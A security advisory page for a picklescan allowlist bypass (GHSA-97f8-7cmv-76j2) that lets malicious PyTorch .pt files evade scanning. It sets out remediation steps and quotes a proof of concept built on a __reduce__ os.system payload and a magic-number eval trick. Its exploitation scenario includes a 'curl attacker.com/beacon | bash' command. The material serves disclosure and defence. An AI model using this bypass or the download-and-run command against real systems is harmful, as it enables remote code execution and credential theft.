GHSA-97f8-7cmv-76j2: picklescan: Allowlist Bypass evades input filtering

GHSA-97f8-7cmv-76j2 HIGH
Published February 18, 2026
CISO Take

If your ML pipeline relies on picklescan to gate PyTorch model ingestion, that control has a known bypass — upgrade to picklescan 1.0.3 immediately. A public PoC exists, the technique is straightforward, and the payload delivers full code execution on model load. Re-scan any external .pt files vetted with older versions and enforce weights_only=True in all torch.load() calls as an independent defense-in-depth measure.

Risk Assessment

HIGH. The attack undermines a dedicated security control explicitly deployed to detect malicious ML models, meaning the scanner output actively provides false assurance. The PoC is public, requires no ML expertise (only knowledge of Python pickle internals), and delivers arbitrary OS command execution. Risk is amplified in organizations that treat a clean picklescan result as sufficient to trust a model file. Any pipeline ingesting external PyTorch .pt files with picklescan < 1.0.3 should be treated as compromised until remediated.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 1.0.3 1.0.3
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

6 steps
  1. PATCH

    Upgrade picklescan to >= 1.0.3 immediately — this is the primary fix.

  2. RESCAN

    Re-scan all external .pt files ingested while running picklescan < 1.0.3, treating prior clean results as unverified.

  3. ENFORCE weights_only=True: In all torch.load() calls — this blocks pickle-based code execution as an independent control regardless of scanner results.

  4. SANDBOX

    Load models in isolated containers (no network egress, restricted filesystem) even after passing scanner validation.

  5. PREFER SafeTensors: Migrate model distribution to SafeTensors format, which eliminates this class of vulnerability entirely by avoiding pickle serialization.

  6. AUDIT PIPELINES

    Identify every pipeline that calls picklescan and every call site using torch.load() with weights_only=False — these are your blast radius.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.15 - Accuracy, Robustness and Cybersecurity Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.1.6 - AI supply chain risk management A.6.2.3 - AI System Security A.8.4 - AI system security and resilience A.9.1 - AI Supply Chain Management
NIST AI RMF
GOVERN 6.2 - AI risk or related factors are considered in acquisition decisions GOVERN-6.2 - AI Risk in the Supply Chain MANAGE-2.4 - Countermeasures are identified and documented MEASURE 2.7 - AI system security testing and evaluation
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-97f8-7cmv-76j2?

If your ML pipeline relies on picklescan to gate PyTorch model ingestion, that control has a known bypass — upgrade to picklescan 1.0.3 immediately. A public PoC exists, the technique is straightforward, and the payload delivers full code execution on model load. Re-scan any external .pt files vetted with older versions and enforce weights_only=True in all torch.load() calls as an independent defense-in-depth measure.

Is GHSA-97f8-7cmv-76j2 actively exploited?

No confirmed active exploitation of GHSA-97f8-7cmv-76j2 has been reported, but organizations should still patch proactively.

How to fix GHSA-97f8-7cmv-76j2?

1. PATCH: Upgrade picklescan to >= 1.0.3 immediately — this is the primary fix. 2. RESCAN: Re-scan all external .pt files ingested while running picklescan < 1.0.3, treating prior clean results as unverified. 3. ENFORCE weights_only=True: In all torch.load() calls — this blocks pickle-based code execution as an independent control regardless of scanner results. 4. SANDBOX: Load models in isolated containers (no network egress, restricted filesystem) even after passing scanner validation. 5. PREFER SafeTensors: Migrate model distribution to SafeTensors format, which eliminates this class of vulnerability entirely by avoiding pickle serialization. 6. AUDIT PIPELINES: Identify every pipeline that calls picklescan and every call site using torch.load() with weights_only=False — these are your blast radius.

What systems are affected by GHSA-97f8-7cmv-76j2?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, model registries, ML CI/CD pipelines, data science workstations.

What is the CVSS score for GHSA-97f8-7cmv-76j2?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary This is a scanning bypass to `scan_pytorch` function in `picklescan`. As we can see in the implementation of [get_magic_number()](https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/torch.py#L76C5-L84) that uses `pickletools.genops(data)` to get the `magic_number` with the condition `opcode.name` includes `INT` or `LONG`, but the PyTorch's implemtation simply uses [pickle_module.load()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1797) to get this `magic_number`. For this implementation difference, we then can embed the `magic_code` into the `PyTorch` file via dynamic `eval` on the `\_\_reduce\_\_` trick, which can make the `pickletools.genops(data)` cannot get the `magic_code` in `INT` or `LONG` type, but the `pickle_module.load()` can still return the same `magic_code`, eading to a bypass. ### PoC #### Attack Step 1 we can edit the source code of the function [\_legacy\_save()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1120) as follows: ```Python class payload: def __reduce__(self): return (eval, ('MAGIC_NUMBER',)) pickle_module.dump(payload(), f, protocol=pickle_protocol) ``` #### Attack Step 2 with the modified version of `PyTorch`, we run the following PoC to generate the `payload.pt`: ```Python import torch class payload: def __reduce__(self): return (__import__('os').system, ('touch /tmp/hacked',)) torch.save(payload(), './payload.pt', _use_new_zipfile_serialization = False) ``` #### Picklescan result ``` ERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356 ----------- SCAN SUMMARY ----------- Scanned files: 0 Infected files: 0 Dangerous globals: 0 ``` #### Victim Step ```Python import torch torch.load('./payload.pt', weights_only=False) ``` then you can find the illegal file `/tmp/hacked` created in your local system. ### Impact Craft malicious `PyTorch` payloads to bypass `picklescan`, then recall ACE/RCE.

Exploitation Scenario

An adversary uploads a malicious .pt file to a shared model repository (internal MinIO, HuggingFace private space, or emailed to an ML team). The file is serialized with _use_new_zipfile_serialization=False and contains a class whose __reduce__ returns (eval, ('MAGIC_NUMBER',)) to satisfy the magic number check, plus a second payload class that executes os.system('curl attacker.com/beacon | bash'). The automated ingestion pipeline runs picklescan — result: 0 infected files. The model is promoted to staging. An ML engineer or inference service calls torch.load('./model.pt', weights_only=False). The payload executes with the service account's privileges, establishing a reverse shell or exfiltrating cloud credentials from the training environment.

Timeline

Published
February 18, 2026
Last Modified
February 18, 2026
First Seen
March 24, 2026

Related Vulnerabilities